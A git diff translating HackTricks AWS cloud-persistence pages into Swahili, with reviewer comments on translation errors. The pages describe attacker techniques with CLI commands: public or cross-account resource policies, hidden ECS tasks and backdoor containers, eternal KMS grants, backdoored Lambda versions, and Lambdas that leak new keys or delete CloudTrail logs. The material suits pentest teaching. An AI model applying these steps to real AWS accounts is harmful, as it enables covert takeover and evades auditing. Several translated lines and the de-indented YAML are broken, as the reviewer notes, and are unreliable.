diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 07928fbd4..336fbf6da 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -4,98 +4,88 @@
## ECR
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-ecr-enum.md
{{#endref}}
-### Hidden Docker Image with Malicious Code
+### Picha ya Docker Iliyojificha yenye Msimbo Mbaya
-An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
+Mshambuliaji anaweza **kupakia picha ya Docker yenye msimbo mbaya** kwenye hifadhi ya ECR na kuitumia kudumisha uvumilivu katika akaunti ya AWS inayolengwa. Mshambuliaji anaweza kisha kupeleka picha hiyo mbaya kwa huduma mbalimbali ndani ya akaunti, kama vile Amazon ECS au EKS, kwa njia ya siri.
-### Repository Policy
-
-Add a policy to a single repository granting yourself (or everybody) access to a repository:
+### Sera ya Hifadhi
+Ongeza sera kwa hifadhi moja ikikupa wewe (au kila mtu) ufikiaji wa hifadhi:
```bash
aws ecr set-repository-policy \
- --repository-name cluster-autoscaler \
- --policy-text file:///tmp/my-policy.json
+--repository-name cluster-autoscaler \
+--policy-text file:///tmp/my-policy.json
# With a .json such as
{
- "Version" : "2008-10-17",
- "Statement" : [
- {
- "Sid" : "allow public pull",
- "Effect" : "Allow",
- "Principal" : "*",
- "Action" : [
- "ecr:BatchCheckLayerAvailability",
- "ecr:BatchGetImage",
- "ecr:GetDownloadUrlForLayer"
- ]
- }
- ]
+"Version" : "2008-10-17",
+"Statement" : [
+{
+"Sid" : "allow public pull",
+"Effect" : "Allow",
+"Principal" : "*",
+"Action" : [
+"ecr:BatchCheckLayerAvailability",
+"ecr:BatchGetImage",
+"ecr:GetDownloadUrlForLayer"
+]
+}
+]
}
```
-
> [!WARNING]
-> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
+> Kumbuka kwamba ECR inahitaji watumiaji kuwa na **ruhusa** ya kufanya simu kwa **`ecr:GetAuthorizationToken`** API kupitia sera ya IAM **kabla ya kuweza kuthibitisha** kwenye rejista na kusukuma au kuvuta picha yoyote kutoka kwenye hifadhi yoyote ya Amazon ECR.
-### Registry Policy & Cross-account Replication
+### Sera ya Rejista & Urejeleaji wa Makaratasi Mbalimbali
-It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
+Inawezekana kurejeleza moja kwa moja rejista katika akaunti ya nje kwa kuunda urejeleaji wa makaratasi mbalimbali, ambapo unahitaji **kuashiria akaunti ya nje** ambapo unataka kurejeleza rejista hiyo.
-First, you need to give the external account access over the registry with a **registry policy** like:
-
+Kwanza, unahitaji kutoa akaunti ya nje ufikiaji juu ya rejista kwa kutumia **sera ya rejista** kama:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
- "Sid": "asdasd",
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam::947247140022:root"
- },
- "Action": [
- "ecr:CreateRepository",
- "ecr:ReplicateImage"
- ],
- "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
+"Sid": "asdasd",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::947247140022:root"
+},
+"Action": [
+"ecr:CreateRepository",
+"ecr:ReplicateImage"
+],
+"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
-
-Then apply the replication config:
-
+Kisha tumia usanidi wa nakala:
```bash
aws ecr put-replication-configuration \
- --replication-configuration file://replication-settings.json \
- --region us-west-2
+--replication-configuration file://replication-settings.json \
+--region us-west-2
# Having the .json a content such as:
{
- "rules": [{
- "destinations": [{
- "region": "destination_region",
- "registryId": "destination_accountId"
- }],
- "repositoryFilters": [{
- "filter": "repository_prefix_name",
- "filterType": "PREFIX_MATCH"
- }]
- }]
+"rules": [{
+"destinations": [{
+"region": "destination_region",
+"registryId": "destination_accountId"
+}],
+"repositoryFilters": [{
+"filter": "repository_prefix_name",
+"filterType": "PREFIX_MATCH"
+}]
+}]
}
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
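Review bot: `Urejeleaji wa Makaratasi Mbalimbali` in the heading renders `Cross-account Replication` as replication of assorted papers (`makaratasi`); the body line below already uses `akaunti ya nje`, so the heading should use `akaunti` as well, or keep `Cross-account Replication` untranslated as a product term. `uvumilivu` (patience) for persistence is inconsistent with `uendelevu` used elsewhere in the commit, and `kufanya simu kwa ... API` is literally a phone call; `kuita API` is the usual rendering. The stripped indentation in the three JSON policy documents does not change their meaning but makes the nesting hard to follow; keep the original indentation inside fenced blocks.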
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
index 988626c8f..79af6532b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
@@ -4,29 +4,28 @@
## ECS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-ecs-enum.md
{{#endref}}
-### Hidden Periodic ECS Task
+### Kazi ya ECS ya Kila Wakati Isiyoonekana
> [!NOTE]
> TODO: Test
-An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
-
+Mshambuliaji anaweza kuunda kazi ya ECS ya kila wakati isiyoonekana kwa kutumia Amazon EventBridge ili **kuweka ratiba ya utekelezaji wa kazi mbaya kila wakati**. Kazi hii inaweza kufanya upelelezi, kuhamasisha data, au kudumisha kudumu katika akaunti ya AWS.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
- {
- "name": "malicious-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
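Review bot: `Kazi ya ECS ya Kila Wakati Isiyoonekana` describes a hidden ECS task that runs all the time, whereas the original `Hidden Periodic ECS Task` describes a scheduled, recurring task; `ya mara kwa mara` conveys periodic and matches the `rate(...)` schedule in the EventBridge rule below. `kuhamasisha data` means to mobilise or motivate data; for `exfiltrate data` use `kutoa data nje` or keep `exfiltrate`.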
@@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
- {
- "Id": "malicious-ecs-task-target",
- "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
- "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
- "EcsParameters": {
- "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
- "TaskCount": 1
- }
- }
+{
+"Id": "malicious-ecs-task-target",
+"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
+"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
+"EcsParameters": {
+"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
+"TaskCount": 1
+}
+}
]'
```
-
-### Backdoor Container in Existing ECS Task Definition
+### Backdoor Container katika Mwelekeo wa Kazi wa ECS uliopo
> [!NOTE]
> TODO: Test
-An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
-
+Mshambuliaji anaweza kuongeza **container ya nyuma isiyoonekana** katika mwelekeo wa kazi wa ECS uliopo ambayo inafanya kazi pamoja na container halali. Container ya nyuma inaweza kutumika kwa kudumu na kutekeleza shughuli mbaya.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
- {
- "name": "legitimate-container",
- "image": "legitimate-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- },
- {
- "name": "backdoor-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": false
- }
+{
+"name": "legitimate-container",
+"image": "legitimate-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+},
+{
+"name": "backdoor-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": false
+}
]'
```
-
-### Undocumented ECS Service
+### Huduma ya ECS Isiyoandikwa
> [!NOTE]
> TODO: Test
-An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
-
+Mshambuliaji anaweza kuunda **huduma ya ECS isiyoandikwa** inayokimbiza kazi mbaya. Kwa kuweka idadi inayotakiwa ya kazi kuwa ya chini na kuzima uandishi wa kumbukumbu, inakuwa vigumu kwa wasimamizi kugundua huduma hiyo mbaya.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
- {
- "name": "malicious-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
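Review bot: `Mwelekeo wa Kazi` (direction of work) for `task definition` obscures an ECS term; keep `task definition` untranslated, and use one rendering for backdoor: the heading keeps `Backdoor Container` in English while the body switches to `container ya nyuma` (a back container). `Huduma ya ECS Isiyoandikwa` (unwritten service) is acceptable for `Undocumented ECS Service`. Pre-existing in both versions: the last section registers a family named `malicious-task` with the same container definition as the first section, which only creates a new revision of that family rather than a distinct definition; if the intent is a separate hidden service, the family name should differ.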
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
index bdb282d41..766af8e29 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
@@ -4,22 +4,18 @@
## EFS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-efs-enum.md
{{#endref}}
-### Modify Resource Policy / Security Groups
+### Badilisha Sera ya Rasilimali / Vikundi vya Usalama
-Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
+Kwa kubadilisha **sera ya rasilimali na/v au vikundi vya usalama** unaweza kujaribu kudumisha ufikiaji wako kwenye mfumo wa faili.
-### Create Access Point
+### Unda Kituo cha Ufikiaji
-You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
+Unaweza **kuunda kituo cha ufikiaji** (ikiwa na ufikiaji wa mzizi kwa `/`) kinachoweza kufikiwa kutoka kwa huduma ambapo umeanzisha **muhimu nyingine** ili kudumisha ufikiaji wa kijasiri kwenye mfumo wa faili.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
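Review bot: Two mistranslations in this hunk change the meaning. `sera ya rasilimali na/v au vikundi vya usalama` has a stray `v` (it should read `na/au`), and in the access-point paragraph `other persistence` became `muhimu nyingine` (other important) while `privileged access` became `ufikiaji wa kijasiri` (brave access). Suggest `uendelevu mwingine`, the word the Elastic Beanstalk page in this same PR uses for persistence, and `ufikiaji wenye mamlaka`, matching `kundi lenye mamlaka` on the IAM page.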
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
index c55e0e2ba..0388e3ec8 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
@@ -4,7 +4,7 @@
## Elastic Beanstalk
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-elastic-beanstalk-enum.md
@@ -12,23 +12,22 @@ For more information check:
### Persistence in Instance
-In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
+Ili kudumisha uendelevu ndani ya akaunti ya AWS, **mekanismu ya uendelevu inaweza kuanzishwa ndani ya instance** (kazi ya cron, ufunguo wa ssh...) ili mshambuliaji aweze kuipata na kuiba **credentials za IAM role kutoka kwa huduma ya metadata**.
### Backdoor in Version
-An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
+Mshambuliaji anaweza kuweka backdoor kwenye msimbo ndani ya repo ya S3 ili kila wakati ifanye backdoor yake na msimbo unaotarajiwa.
### New backdoored version
-Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
+Badala ya kubadilisha msimbo kwenye toleo halisi, mshambuliaji anaweza kupeleka toleo jipya lililo na backdoor la programu.
### Abusing Custom Resource Lifecycle Hooks
> [!NOTE]
> TODO: Test
-Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
-
+Elastic Beanstalk inatoa mizunguko ya maisha ambayo inakuruhusu kuendesha skripti za kawaida wakati wa upatikanaji na kumalizika kwa instance. Mshambuliaji anaweza **kuweka mzunguko wa maisha ili kwa muda fulani kuendesha skripti inayotoa data au kudumisha ufikiaji wa akaunti ya AWS**.
```bash
bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
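Review bot: `lifecycle hooks` is translated as `mizunguko ya maisha` (life cycles) and `configure a lifecycle hook` as `kuweka mzunguko wa maisha`, which loses the hook concept that the heading `### Abusing Custom Resource Lifecycle Hooks` and the YAML below it (`Type: AWS::AutoScaling::LifecycleHook`) depend on; keep `lifecycle hook` as an untranslated technical term, as this PR already does for `backdoor`, `instance` and `credentials`. The four headings in this hunk (`### Persistence in Instance`, `### Backdoor in Version`, `### New backdoored version`, `### Abusing Custom Resource Lifecycle Hooks`) are also left in English while their paragraphs are translated, whereas other pages in the PR translate headings; this should be consistent.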
@@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
- AWSEBAutoScalingGroup:
- Metadata:
- AWS::ElasticBeanstalk::Ext:
- TriggerConfiguration:
- triggers:
- - name: stealthy-lifecycle-hook
- events:
- - "autoscaling:EC2_INSTANCE_LAUNCH"
- - "autoscaling:EC2_INSTANCE_TERMINATE"
- target:
- ref: "AWS::ElasticBeanstalk::Environment"
- arn:
- Fn::GetAtt:
- - "AWS::ElasticBeanstalk::Environment"
- - "Arn"
- stealthyLifecycleHook:
- Type: AWS::AutoScaling::LifecycleHook
- Properties:
- AutoScalingGroupName:
- Ref: AWSEBAutoScalingGroup
- LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
- NotificationTargetARN:
- Ref: stealthy-lifecycle-hook
- RoleARN:
- Fn::GetAtt:
- - AWSEBAutoScalingGroup
- - Arn' > stealthy_lifecycle_hook.yaml
+AWSEBAutoScalingGroup:
+Metadata:
+AWS::ElasticBeanstalk::Ext:
+TriggerConfiguration:
+triggers:
+- name: stealthy-lifecycle-hook
+events:
+- "autoscaling:EC2_INSTANCE_LAUNCH"
+- "autoscaling:EC2_INSTANCE_TERMINATE"
+target:
+ref: "AWS::ElasticBeanstalk::Environment"
+arn:
+Fn::GetAtt:
+- "AWS::ElasticBeanstalk::Environment"
+- "Arn"
+stealthyLifecycleHook:
+Type: AWS::AutoScaling::LifecycleHook
+Properties:
+AutoScalingGroupName:
+Ref: AWSEBAutoScalingGroup
+LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
+NotificationTargetARN:
+Ref: stealthy-lifecycle-hook
+RoleARN:
+Fn::GetAtt:
+- AWSEBAutoScalingGroup
+- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
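Review bot: The `+` lines rewrite the YAML heredoc with all indentation removed, which makes it invalid: `Resources:`, `AWSEBAutoScalingGroup:` and `Metadata:` become sibling top-level keys with null values, and the list item `- name: stealthy-lifecycle-hook` following a mapping key at the same level is a YAML parse error, so the generated `stealthy_lifecycle_hook.yaml` can no longer be loaded. Nothing in this block needed translating; restore the original indented lines byte for byte. While this block is being touched, the context line `bashCopy code# Attacker creates a script that exfiltrates data and maintains access` carries copy-button residue from wherever the snippet was pasted and should start at `# Attacker creates a script ...`.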
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
index e3e1944e7..1b490f61b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
@@ -4,50 +4,44 @@
## IAM
-For more information access:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
-### Common IAM Persistence
+### Uthibitishaji wa IAM wa Kawaida
-- Create a user
-- Add a controlled user to a privileged group
-- Create access keys (of the new user or of all users)
-- Grant extra permissions to controlled users/groups (attached policies or inline policies)
-- Disable MFA / Add you own MFA device
-- Create a Role Chain Juggling situation (more on this below in STS persistence)
+- Unda mtumiaji
+- Ongeza mtumiaji anayedhibitiwa kwenye kundi lenye mamlaka
+- Unda funguo za ufikiaji (za mtumiaji mpya au za watumiaji wote)
+- Toa ruhusa za ziada kwa watumiaji/vikundi vilivyo na udhibiti (sera zilizounganishwa au sera za ndani)
+- Zima MFA / Ongeza kifaa chako cha MFA
+- Unda hali ya Mnyororo wa Jukumu (zaidi kuhusu hii hapa chini katika uthibitishaji wa STS)
-### Backdoor Role Trust Policies
-
-You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
+### Sera za Kuamini Jukumu la Backdoor
+Unaweza kuingiza backdoor kwenye sera ya kuamini ili uweze kuichukua kwa rasilimali ya nje inayodhibitiwa na wewe (au kwa kila mtu):
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "AWS": ["*", "arn:aws:iam::123213123123:root"]
- },
- "Action": "sts:AssumeRole"
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": ["*", "arn:aws:iam::123213123123:root"]
+},
+"Action": "sts:AssumeRole"
+}
+]
}
```
+### Sera ya Backdoor
-### Backdoor Policy Version
+Patia ruhusa za Msimamizi sera katika toleo lake si la mwisho (toleo la mwisho linapaswa kuonekana halali), kisha piga hiyo sera kwa mtumiaji/jeshi lililodhibitiwa.
-Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
+### Backdoor / Unda Mtoa Kitambulisho
-### Backdoor / Create Identity Provider
-
-If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
+Ikiwa akaunti tayari inatumia mtoa kitambulisho wa kawaida (kama Github) masharti ya uaminifu yanaweza kuongezwa ili mshambuliaji aweze kuyatumia.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
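Review bot: `Persistence` is rendered as `Uthibitishaji` (verification/authentication) in `### Uthibitishaji wa IAM wa Kawaida` and in the `uthibitishaji wa STS` cross-reference, which sends the reader to the wrong concept; use `uendelevu`, as the Elastic Beanstalk page in this PR does. The heading `### Sera ya Backdoor` drops `Version` from `### Backdoor Policy Version`, and the paragraph under it translates `user/group` as `mtumiaji/jeshi` (army) instead of `mtumiaji/kikundi`, the word already used in the bullet list above (`vikundi`). The trust-policy JSON also loses its indentation in the `+` lines; it remains valid JSON, but code blocks in a translation PR should be left untouched.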
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
index 7aefbd410..cc64ee43f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
@@ -4,40 +4,34 @@
## KMS
-For mor information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-kms-enum.md
{{#endref}}
-### Grant acces via KMS policies
+### Toa ufikiaji kupitia sera za KMS
-An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
+Mshambuliaji anaweza kutumia ruhusa **`kms:PutKeyPolicy`** ili **kutoa ufikiaji** kwa funguo kwa mtumiaji chini ya udhibiti wake au hata kwa akaunti ya nje. Angalia [**ukurasa wa KMS Privesc**](../aws-privilege-escalation/aws-kms-privesc.md) kwa maelezo zaidi.
### Eternal Grant
-Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
+Mikopo ni njia nyingine ya kutoa ruhusa kwa kiongozi juu ya funguo maalum. Inawezekana kutoa mkopo unaomruhusu mtumiaji kuunda mikopo. Zaidi ya hayo, mtumiaji anaweza kuwa na mikopo kadhaa (hata sawa) juu ya funguo hiyo hiyo.
-Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
-
-(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
+Hivyo, inawezekana kwa mtumiaji kuwa na mikopo 10 yenye ruhusa zote. Mshambuliaji anapaswa kufuatilia hili mara kwa mara. Na ikiwa kwa wakati fulani mkopo 1 utaondolewa, mingine 10 inapaswa kuundwa.
+(Tunatumia 10 na si 2 ili kuweza kugundua kwamba mkopo umeondolewa wakati mtumiaji bado ana mkopo fulani)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
- --key-id \
- --grantee-principal \
- --operations "CreateGrant" "Decrypt"
+--key-id \
+--grantee-principal \
+--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id
```
-
> [!NOTE]
-> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+> Utoaji unaweza kutoa ruhusa tu kutoka hapa: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
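Review bot: `grant` is translated as `mkopo`/`mikopo` (loan) throughout the Eternal Grant paragraphs but as `Utoaji` in the note below the code block, and `principal` becomes `kiongozi` (leader); since the command in the same block is `aws kms create-grant` with `--grantee-principal`, keep `grant` and `principal` as untranslated AWS terms, or at minimum use one word for each consistently. The `--key-id \` and `--grantee-principal \` continuation lines also lose their indentation, harmless for bash but an unneeded edit to a code block.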
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
index 1390c2d55..479a3bbd2 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
@@ -4,7 +4,7 @@
## Lambda
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../../aws-services/aws-lambda-enum.md
@@ -12,7 +12,7 @@ For more information check:
### Lambda Layer Persistence
-It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
+Inawezekana **kuanzisha/backdoor layer ili kutekeleza msimbo wowote** wakati lambda inatekelezwa kwa njia ya siri:
{{#ref}}
aws-lambda-layers-persistence.md
@@ -20,49 +20,45 @@ aws-lambda-layers-persistence.md
### Lambda Extension Persistence
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+Kwa kutumia Lambda Layers inawezekana pia kutumia extensions na kudumu katika lambda lakini pia kuiba na kubadilisha maombi.
{{#ref}}
aws-abusing-lambda-extensions.md
{{#endref}}
-### Via resource policies
+### Kupitia sera za rasilimali
-It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
+Inawezekana kutoa ufikiaji kwa vitendo tofauti vya lambda (kama vile kuita au kuboresha msimbo) kwa akaunti za nje:
-### Versions, Aliases & Weights
+### Matoleo, Majina Mbadala & Uzito
-A Lambda can have **different versions** (with different code each version).\
-Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
-This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
+Lambda inaweza kuwa na **matoleo tofauti** (ikiwa na msimbo tofauti kila toleo).\
+Kisha, unaweza kuunda **majina mbadala tofauti na matoleo tofauti** ya lambda na kuweka uzito tofauti kwa kila moja.\
+Hivi ndivyo mshambuliaji anaweza kuunda **toleo la backdoored 1** na **toleo la 2 lenye msimbo halali tu** na **kutekeleza toleo la 1 tu katika 1%** ya maombi ili kubaki kwa siri.
-### Version Backdoor + API Gateway
+### Toleo la Backdoor + API Gateway
-1. Copy the original code of the Lambda
-2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
- 1. Call the API gateway related to the lambda to execute the code
-3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
- 1. This will hide the backdoored code in a previous version
-4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1`
- 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
-5. Select the POST method created and in Actions select **`Deploy API`**
-6. Now, when you **call the function via POST your Backdoor** will be invoked
+1. Nakili msimbo wa asili wa Lambda
+2. **Unda toleo jipya la backdooring** msimbo wa asili (au tu na msimbo mbaya). Chapisha na **peleka toleo hilo** kwa $LATEST
+1. Piga simu kwa API gateway inayohusiana na lambda ili kutekeleza msimbo
+3. **Unda toleo jipya lenye msimbo wa asili**, Chapisha na peleka **toleo hilo** kwa $LATEST.
+1. Hii itaficha msimbo wa backdoored katika toleo la awali
+4. Nenda kwa API Gateway na **unda njia mpya ya POST** (au chagua njia nyingine yoyote) ambayo itatekeleza toleo la backdoored la lambda: `arn:aws:lambda:us-east-1::function::1`
+1. Kumbuka mwisho :1 ya arn **ikiashiria toleo la kazi** (toleo 1 litakuwa la backdoored katika hali hii).
+5. Chagua njia ya POST iliyoundwa na katika Vitendo chagua **`Deploy API`**
+6. Sasa, unapofanya **kuita kazi kupitia POST Backdoor yako** itaitwa
### Cron/Event actuator
-The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
-Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
+Hali kwamba unaweza kufanya **kazi za lambda zifanye kazi wakati kitu kinatokea au wakati muda unapita** inafanya lambda kuwa njia nzuri na ya kawaida ya kupata kudumu na kuepuka kugunduliwa.\
+Hapa kuna mawazo kadhaa ya kufanya **uwepo wako katika AWS uwe wa siri zaidi kwa kuunda lambdas**.
-- Every time a new user is created lambda generates a new user key and send it to the attacker.
-- Every time a new role is created lambda gives assume role permissions to compromised users.
-- Every time new cloudtrail logs are generated, delete/alter them
+- Kila wakati mtumiaji mpya anapoundwa lambda inaunda ufunguo mpya wa mtumiaji na kuutuma kwa mshambuliaji.
+- Kila wakati jukumu jipya linapoundwa lambda inatoa ruhusa za kudhani jukumu kwa watumiaji waliokumbwa.
+- Kila wakati kumbukumbu mpya za cloudtrail zinapoundwa, futa/badilisha hizo.
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
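Review bot: Stripping the leading spaces from the nested steps changes the list structure: `1. Piga simu kwa API gateway ...`, `1. Hii itaficha msimbo wa backdoored ...` and `1. Kumbuka mwisho :1 ya arn ...` were sub-items of steps 2, 3 and 4 in the original and now sit at top level, so Markdown renders them as extra numbered steps (the `1.` marker is ignored after `2.`) and the six-step procedure reads as nine steps. Restore the indentation on those three lines. Also `### Cron/Event actuator` is left untranslated while every other heading in this hunk is translated.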
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
index 71655ada0..09a09f417 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -4,35 +4,35 @@
## Lambda Extensions
